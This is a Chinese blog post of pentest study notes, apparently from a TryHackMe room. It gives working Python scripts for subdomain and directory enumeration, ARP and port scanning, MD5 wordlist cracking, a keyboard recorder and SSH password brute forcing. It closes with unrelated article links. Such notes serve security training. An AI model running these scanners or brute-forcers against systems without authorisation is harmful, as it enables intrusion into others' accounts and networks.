Python for Pentesters

还记得开始学习编程的C,虽然淡忘,但思想仍在。

子域名枚举

request库

import pyfiglet

import requests

import sys 

ascii_banner = pyfiglet.figlet_format("ABC-L")

print(ascii_banner)

dir_path = ""

sub_list = open(dir_path, "r").read()

subdoms = sub_list.splitlines()

for sub in subdoms:

    sub_domains = f"http://{sub}.{sys.argv[1]}" 

    try:

        requests.get(sub_domains)

    except requests.ConnectionError:

        pass

    else:

        print("Valid domain: ",sub_domains)

目录枚举

还是requests

import requests

import sys

import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")

print(ascii_banner)

path = ''

sub_list = open(path,'r').read()

directories = sub_list.splitlines()

for dir in directories:

    dir_enum = f"http://{sys.argv[1]}/{dir}"

    r = requests.get(dir_enum)

    if r.status_code==404:

        pass

    else:

        print("Valid directory:" ,dir_enum)

网络扫描



from scapy.all import *

import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")

print(ascii_banner)

interface = "eth0"

ip_range = "10.10.X.X/24"

broadcastMac = "ff:ff:ff:ff:ff:ff"

packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range) 

ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1)

for send,receive in ans:

        print (receive.sprintf(r"%Ether.src% - %ARP.psrc%"))

端口扫描

socket编程https://www.cnblogs.com/-Lucky-/p/17039661.html

import sys

import socket

import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")

print(ascii_banner)

ip = sys.argv[1]

open_ports =[]

ports = range(1, 65535)

def probe_port(ip, port):

    result = 1

    try:

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        sock.settimeout(0.5)

        r = sock.connect_ex((ip, port))

        if r == 0:

            result = r

        sock.close()

    except Exception as e:

        pass

    return result

for port in ports:

    sys.stdout.flush()

    response = probe_port(ip, port)

    if response == 0:

        open_ports.append(port) 

print(f"Open Ports:{open_ports}")

文件下载器

Linux 系统上的 Wget 或 Windows 上的 Certutil 是下载文件的有用工具。

import requests

url = 'https://assets.tryhackme.com/img/THMlogo.png'

r = requests.get(url, allow_redirects=True)

open('THMlogo.png', 'wb').write(r.content)

import requests

url = 'https://download.sysinternals.com/files/PSTools.zip'

r = requests.get(url, allow_redirects=True)

open('PSTools.zip', 'wb').write(r.content)

hash破解

tools:john,hashcat

import hashlib

import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")

print(ascii_banner)

wordlist_location = str(input('Enter wordlist file location: '))

hash_input = str(input('Enter hash to be cracked: '))

with open(wordlist_location, 'r') as file:

    for line in file.readlines():

        print(line)

        hash_ob = hashlib.md5(line.strip().encode())

        hashed_pass = hash_ob.hexdigest()

        if hashed_pass == hash_input:

            print('Found cleartext password! ' + line.strip())

            exit(0)

键盘记录器

import keyboard

keys = keyboard.record(until ='ENTER')

keyboard.play(keys)

ssh暴力破解

tools:hydra

import paramiko

import sys

import os

target = str(input('Please enter target IP address: '))

username = str(input('Please enter username to bruteforce: '))

password_file = str(input('Please enter location of the password file: '))

def ssh_connect(password, code=0):

    ssh = paramiko.SSHClient()

    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:

        ssh.connect(target, port=22, username=username, password=password)

    except paramiko.AuthenticationException:

        code = 1

    ssh.close()

    return code

with open(password_file, 'r') as file:

    for line in file.readlines():

        password = line.strip()

        try:

            response = ssh_connect(password)

            if response == 0:

                 print('password found: '+ password)

                 exit(0)

            elif response == 1:

                print('no luck')

        except Exception as e:

            print(e)

        pass

input_file.close()

基于渗透的python的更多相关文章

  1. 基于SQL和PYTHON的数据库数据查询select语句

    #xiaodeng#python3#基于SQL和PYTHON的数据库数据查询语句import pymysql #1.基本用法cur.execute("select * from biao&q ...

  2. DIY一个基于树莓派和Python的无人机视觉跟踪系统

    DIY一个基于树莓派和Python的无人机视觉跟踪系统 无人机通过图传将航拍到的图像存储并实时传送回地面站差点儿已经是标配.假设想来点高级的--在无人机上直接处理拍摄的图像并实现自己主动控制要怎么实现 ...

  3. 基于七牛Python SDK写的一个批量下载脚本

    前言 上一篇基于七牛Python SDK写的一个同步脚本所写的脚本只支持上传,不支持文件下载. 虽然这个需求不太强烈,但有可能有人(在备份.迁移时)需要,而官方有没提供对应的工具,所以我就把这个功能也 ...

  4. 配置基于Vim的Python开发环境

    配置基于Vim的Python开发环境插件 Vundle YouCompleteMe NERDTree Vim-Jinja2-Syntax set nocompatible " be iMpr ...

  5. 基于Appium、Python的自动化测试

    基于Appium.Python的自动化测试环境部署和实践   第一章 导言 1.1 编制目的 该文档为选用Appium作为移动设备原生(Native).混合(Hybrid).移动Web(Mobile ...

  6. 如何在Windows系统上基于Sublime搭建Python的编译环境

    刚刚接触到Python,直接在计算机上编译时不能正确的运行,所以将一些有关编译环境调试的知识总结了一下. 环境搭建: Python在 windows系统上编译的时候可能会出现一些编译无法运行的情况,我 ...

  7. 基于Pycharm的Python开发环境配置

    基于Pycharm的Python开发环境配置 编辑于2020-11-18 Python安装 双击桌面的Python3.x安装包. 勾选Add to path. 方便起见,选择Install now.下 ...

  8. 基于Selenium2与Python自动化测试环境搭建

    简介: selenium 是一个web的自动化测试工具,不少学习功能自动化的同学开始首选selenium ,相因为它相比QTP有诸多有点: *  免费,也不用再为破解QTP而大伤脑筋 *  小巧,对于 ...

  9. 基于esky实现python应用的自动升级

    一.esky介绍 Esky is an auto-update framework for frozen Python applications. It provides a simple API t ...

  10. 基于ELK和Python搭建简单的监控告警系统

    Reference: https://www.jianshu.com/p/67e358dc065d 在做完支付系统后,我搭建了两套监控系统. 一套是点评的CAT,主要用于代码级的实时统计和历史统计以及 ...

随机推荐

  1. NodeJs的模块化和包

    模块化的基本概念 什么是模块化? 模块化是解决一个复杂问题时,自顶向下逐层把系统划分为若干个模块的过程,编程中,就是遵守一定规则,把一个大文件拆成独立并相互依赖的多个小模块. 模块化规范 使用什么样的 ...

  2. day3 函数的定义和调用,练习编写简单的程序(记录2)

    一.值传递.指针传递.引用传递 值传递: 在值传递中,函数的形参是由实参的副本初始化的,也就是说,函数内部操作的是实参的一个拷贝.值传递适用于传递简单数据类型(如整数.浮点数.字符等)以及小型结构体等 ...

  3. Redis的自增也能实现滑动窗口限流?

    限流是大家开发之路上一定会遇到的需求.比如:限制一定时间内,接口请求请求频率:一定时间内用户发言.评论次数等等,类似于滑动窗口算法.这里分享一份拿来即用的代码,一起看看如何利用常见的 Redis 实现 ...

  4. 方差分析2——双因素方差分析(R语言)

    双因素方差分析(Double factor variance analysis) 有两种类型:一个是无交互作用的双因素方差分析,它假定因素A和因素B的效应之间是相互独立的,不存在相互关系:另一个是有交 ...

  5. python:selenium爬取boss网站被关小黑屋

    问题描述:使用selenium访问次数过多,被boss反爬封掉IP,这种方式有什么好一点的解决方法,首次可以用图形验证解封,今天访问次数过多,被关进了小黑屋 首次让我用图形界面解封 不过还好,手动解封 ...

  6. Terraform 系列-Terraform 简介

    系列文章 Terraform 系列文章 前言 最近在使用 Terraform 来置备 OCI 的 Always Free Tier, 发现它非常好用.总结学习下:Terraform 的基础知识. 什么 ...

  7. 家用wife密码设置

    1.在浏览器上面输入ip地址:http://192.168.1.1/或http://192.168.0.1/出现路由器登陆窗口输入用户名跟密码.用户名默认一般为:admin,密码为空或为:admin ...

  8. ES6中新增的promise异步编程解决方案

    promise异步编程解决方案 第1章 准备 1.1 区别实例对象与函数对象 (1).实例对象:通过    new 函数    产生的对象,称为实例对象,简称对象 (2).函数对象:将函数作为对象使用 ...

  9. 为什么数据库project被做成了web开发啊啊——一个半小时实现增删查改

    昨天晚上去小破站上找了一点点~~亿点点~~资料,仔细研究了一下我们项目说明文档里的restful框架,发现可以直接用django_restful_framework. 天大的好消息啊!今天下午有三个小 ...

  10. MAPPO学习笔记(1):从PPO算法开始

    由于这段时间的学习内容涉及到MAPPO算法,并且我对MAPPO算法这种多智能体算法的信息交互机制不甚了解,于是写了这个系列的笔记,目的是巩固知识,并且进行一些粗浅又滑稽的总结. 1.PPO算法的介绍 ...